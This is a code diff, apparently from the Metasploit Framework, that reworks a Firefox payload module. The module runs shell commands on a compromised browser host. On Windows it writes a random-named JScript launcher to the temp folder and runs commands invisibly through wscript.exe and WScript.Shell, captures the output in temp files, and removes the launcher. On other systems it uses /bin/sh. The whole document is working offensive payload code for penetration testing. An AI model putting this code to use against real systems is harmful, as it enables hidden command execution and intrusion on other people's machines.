Rework windows shell to use wscript.
parent
06fb2139b0
commit
7961b3eecd
|
@ -33,16 +33,28 @@ module Msf::Payload::Firefox
|
||||||
%Q|
|
%Q|
|
||||||
var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
|
var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
|
||||||
.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
|
.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
|
||||||
var _cmd;
|
var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;
|
||||||
var runCmd = function(cmd) {
|
var runCmd = function(cmd) {
|
||||||
var shPath = "/bin/sh";
|
var shPath = "/bin/sh";
|
||||||
var shFlag = "-c";
|
var shFlag = "-c";
|
||||||
var shEsc = "\\\\$&";
|
var shEsc = "\\\\$&";
|
||||||
|
var windows = (ua.indexOf("Windows")>-1);
|
||||||
|
|
||||||
if (ua.indexOf("Windows")>-1) {
|
if (windows) {
|
||||||
shPath = "C:\\\\Windows\\\\system32\\\\cmd.exe";
|
|
||||||
shFlag = "/c";
|
|
||||||
shEsc = "\\^$&";
|
shEsc = "\\^$&";
|
||||||
|
var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]
|
||||||
|
.getService(Components.interfaces.nsIProperties)
|
||||||
|
.get("TmpD", Components.interfaces.nsIFile);
|
||||||
|
jscriptFile.append('#{Rex::Text.rand_text_alphanumeric(8)}.js');
|
||||||
|
var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
|
||||||
|
.createInstance(Components.interfaces.nsIFileOutputStream);
|
||||||
|
stream.init(jscriptFile, 0x04 \| 0x08 \| 0x20, 0666, 0);
|
||||||
|
stream.write(jscript, jscript.length);
|
||||||
|
if (stream instanceof Components.interfaces.nsISafeOutputStream) {
|
||||||
|
stream.finish();
|
||||||
|
} else {
|
||||||
|
stream.close();
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
|
var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
|
||||||
|
@ -58,19 +70,46 @@ module Msf::Payload::Firefox
|
||||||
.get("TmpD", Components.interfaces.nsIFile);
|
.get("TmpD", Components.interfaces.nsIFile);
|
||||||
stderr.append(stderrFile);
|
stderr.append(stderrFile);
|
||||||
|
|
||||||
var sh = Components.classes["@mozilla.org/file/local;1"]
|
if (windows) {
|
||||||
.createInstance(Components.interfaces.nsILocalFile);
|
var shell = "cmd /c "+cmd;
|
||||||
sh.initWithPath(shPath);
|
shell = "cmd /c "+shell.replace(/\\W/g, shEsc)+" >"+stdout.path+" 2>"+stderr.path;
|
||||||
|
}
|
||||||
var shell = shPath + " " + shFlag + " " + cmd.replace(/\\W/g, shEsc);
|
else {
|
||||||
shell = shPath + " " + shFlag + " " + (shell + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
|
var shell = [shPath, shFlag, cmd.replace(/\\W/g, shEsc)].join(" ");
|
||||||
|
shell = shPath + " " + shFlag + " " + (shell + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
|
||||||
|
}
|
||||||
var process = Components.classes["@mozilla.org/process/util;1"]
|
var process = Components.classes["@mozilla.org/process/util;1"]
|
||||||
.createInstance(Components.interfaces.nsIProcess);
|
.createInstance(Components.interfaces.nsIProcess);
|
||||||
process.init(sh);
|
var sh = Components.classes["@mozilla.org/file/local;1"]
|
||||||
process.run(true, [shFlag, shell], 2);
|
.createInstance(Components.interfaces.nsILocalFile);
|
||||||
return [readFile(stdout.path), readFile(stderr.path)];
|
|
||||||
|
if (windows) {
|
||||||
|
sh.initWithPath("C:\\\\Windows\\\\System32\\\\wscript.exe");
|
||||||
|
process.init(sh);
|
||||||
|
var args = [jscriptFile.path, shell];
|
||||||
|
process.run(true, args, args.length);
|
||||||
|
} else {
|
||||||
|
sh.initWithPath(shPath);
|
||||||
|
process.init(sh);
|
||||||
|
process.run(true, [shFlag, shell], 2);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (windows) {
|
||||||
|
jscriptFile.remove(true);
|
||||||
|
return [cmd+"\\r\\n"+readFile(stdout.path), readFile(stderr.path)];
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
return [readFile(stdout.path), readFile(stderr.path)];
|
||||||
|
}
|
||||||
};
|
};
|
||||||
|
|
|
|
||||||
end
|
end
|
||||||
end
|
|
||||||
|
def jscript_launcher
|
||||||
|
%Q|
|
||||||
|
var cmdStr = '';
|
||||||
|
for (var i = 0; i < WScript.arguments.length; i++) cmdStr += WScript.arguments(i) + " ";
|
||||||
|
(new ActiveXObject("WScript.Shell")).Run(cmdStr, 0, true);
|
||||||
|
|
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
Loading…
Reference in New Issue